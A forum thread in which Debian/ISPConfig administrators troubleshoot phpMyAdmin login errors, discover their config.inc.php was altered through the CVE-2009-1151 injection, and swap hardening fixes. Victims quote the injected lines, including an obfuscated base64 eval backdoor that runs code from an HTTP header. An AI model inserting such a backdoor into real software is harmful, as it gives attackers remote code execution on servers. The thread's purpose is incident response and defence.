Hi,

For some reason my server crashed. When I brought it back up I found no real problems or inconsistencies, but when tried to visit phpmyadmin I get:

1045 - Access denied for user 'root'@'localhost' (using password: NO)
Invalid hostname for server 1. Please review your configuration.

Any way to solve this?

By the way, this shows everytime, i can't even try to login, it happens as soon as i open phpmyadmin.

Make sure that you close all browser windows and then open the browser again before you connect to phpmyadmin.

I have exactly the same problem.

It appeared out of nowhere, maybe after I did an update.

I tried what you suggested, but it seems clear that this is a server problem.

exactly, manarak!

Anyway, what I did as a workaround was:


Edit /var/lib/phpmyadmin/config.inc.php;
Change the option value 'config' to 'cookie'.


I'm still getting the error "Invalid hostname for server 1. Please review your configuration." but at least I can login again.

cool, thanks - it would still be interesting to find out what broke phpmyadmin though.

ok, it looks like the config file was changed, the hostname is commented out and there is a phpinfo(); in its place.

that could be an injection attack ?

is there a known vulnerability?

is there a known vulnerability?

Which software do you mean? ISPConfig or phpmyadmin? In ISPConfig there are no known vulnerabilities.

Which config file was changed?

yes there is:

http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/

we have been injected !!

Make sure that you install all available debian updates. phpmyadmin is part of debian and not part of ispconfig.

my server has always been updated less than 12 hours after new versions were out.

it is just frightening!!

two weeks ago I have been infected with very nasty troyans on the PC inspite of an up-to-date antivirus.

then there are those nasty hidden iframe viruses out...


the internet has become VERY DANGEROUS in the last months!

Ok, then it might be that there is no patch availabe for this vulnerability from debian yet. Sad but might always happen. Scan your system with rkhunter and chrootkit and check if there are any other modifications. Also you should consider to deactivate phpmyadmin temporarily.

if I chmod the config file to 440, that should stop the attack, no?

Its at least worth a try.

could you please change the thread topic and add [phpMyAdmin vulnerability] in front of it?

I changed the topic, but thats the problem if you post to other threads instead of making a new one. The original poster had a login problem with phpmyadmin and this does not nescessarily mean that his system had been hacked like yours.

the probability that he has been injected like me is 99%

the injection does modify the hostname entry in the config file, and his problem appeared out of nowhere in the last days...
Now how big a coincidence is that??

Same issue here. Debian Lenny, last updates. Config file has been modified! Looks serious!!!

read the description of the vulnerability: "arbitrary code execution"
need I say more?

If debian does not release a bugfix for that, you should either remove phpmyadmin or protect it with a .htaccess file or install your own copy from sources without using the debian package.

Due to the nature of the attack, I think chown to root and chmod to 444 will do the trick. What do you you think?

Looks like they got me also.
I was away for a small trip (no internet access), and they got me :-(

Remove /usr/share/phpmyadmin/scripts/ if you have it. That will stop this exploit.

If you want to feel more secure.. you can do this:

nano /usr/share/phpmyadmin/.htaccess

Paste:
<Files "config.inc.php">
Order allow,deny
Deny from all
</Files>

and save.

Try to access your file:
http://www.yourdomain/phpmyadmin/config.inc.php

White page = Not ok.
403 Forbidden = Great! ;)

I did already add the .htaccess to it today, but now I also deleted the /scripts dir

How should the line $cfg['Servers'][$i]['host']=''; phpinfo();//'] = 'localhost'; in /var/lib/phpmyadmin/config.inc.php look?
The phpinfo(); part does not look correct!

Should be:

$cfg['Servers'][$i]['host']= 'localhost';

And one more..

The line:
$cfg['Servers'][$i]['auth_type'] = 'config'
I can only get it to work when set to cookie

My line has been changed for some reason. It now reads:

$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';

Whatta heck??

I lost my original config file now. How could I get it back?

By the way, the only valid line in /var/lib/phpmyadmin/config.inc.php is now:
$i = 0;

And phpmyadmin works without problems again.

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=534618

Today debian released an update for phpmyadmin.

Remove /usr/share/phpmyadmin/scripts/ if you have it. That will stop this exploit.

If you want to feel more secure.. you can do this:

nano /usr/share/phpmyadmin/.htaccessPaste:
<Files "config.inc.php">
Order allow,deny
Deny from all
</Files>and save.

Try to access your file:
http://www.yourdomain/phpmyadmin/config.inc.php

White page = Not ok.
403 Forbidden = Great! ;)
Today debian released an update for phpmyadmin.
the /usr/share/phpmyadmin/scripts directory recreated after update.
the .htaccess in /usr/share/phpmyadmin/ not working for me, got white page only.
i edited the /etc/phpmyadmin/apache.conf and now i get 403 forbidden.

# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

<Directory /usr/share/phpmyadmin>
Options Indexes FollowSymLinks
DirectoryIndex index.php

<Files config.inc.php>
Order allow,deny
Deny from all
</Files>

# Authorize for setup
<Files setup.php>
Order allow,deny
Deny from all
# For Apache 1.3 and 2.0
<IfModule mod_auth.c>
AuthType Basic
AuthName "phpMyAdmin Setup"
AuthUserFile /etc/phpmyadmin/htpasswd.setup
</IfModule>
# For Apache 2.2
<IfModule mod_authn_file.c>
AuthType Basic
AuthName "phpMyAdmin Setup"
AuthUserFile /etc/phpmyadmin/htpasswd.setup
</IfModule>
Require valid-user
</Files>
<IfModule mod_php4.c>
AddType application/x-httpd-php .php

php_flag magic_quotes_gpc Off
php_flag track_vars On
php_flag register_globals Off
php_value include_path .
</IfModule>
<IfModule mod_php5.c>
AddType application/x-httpd-php .php

php_flag magic_quotes_gpc Off
php_flag track_vars On
php_flag register_globals Off
php_value include_path .
</IfModule>
</Directory>need reload or restart the apache after edit
/etc/init.d/apache2 reload

or

/etc/init.d/apache2 restart

sorry, wrong post ..

I also had that error "1045 - Access denied for user" when trying to login to phpMyAdmin after modifying a database username through ISPConfig.

In my case, it wasn't that past phpMyAdmin vulnerability, and simply deleting cookies solved it.

Anyhow, it's advisable to follow this howto or similar: Protect phpMyAdmin On An ISPConfig 3 Server (Debian) (http://howtoforge.net/protect-phpmyadmin-on-an-ispconfig-3-server-debian)

Hi Ive installed ISPconfig3 on Debian Squeeze on a dedicated server with 3 available IP's and everything works fine except for phpmyadmin.

When I create a database I can access phpmyadmin from the ISPconfig panel by clicking the connection to phpmyadmin from the sites/database interface, but I cannot login with the username and password I just set up.


I can login to mysql server from command line by doing

-u root -p

so mysql server is running
Any ideas how to start fault tracing?:confused:

Are there any errors in Apache's error log?

[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php#
[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php#


If I run

show databases; from mysql command line logged in via SSH

I can see the databases that I make in ISPconf3 panel,

Does your MySQL password contain any special characters?

no only letters and 3 numbers : all lower case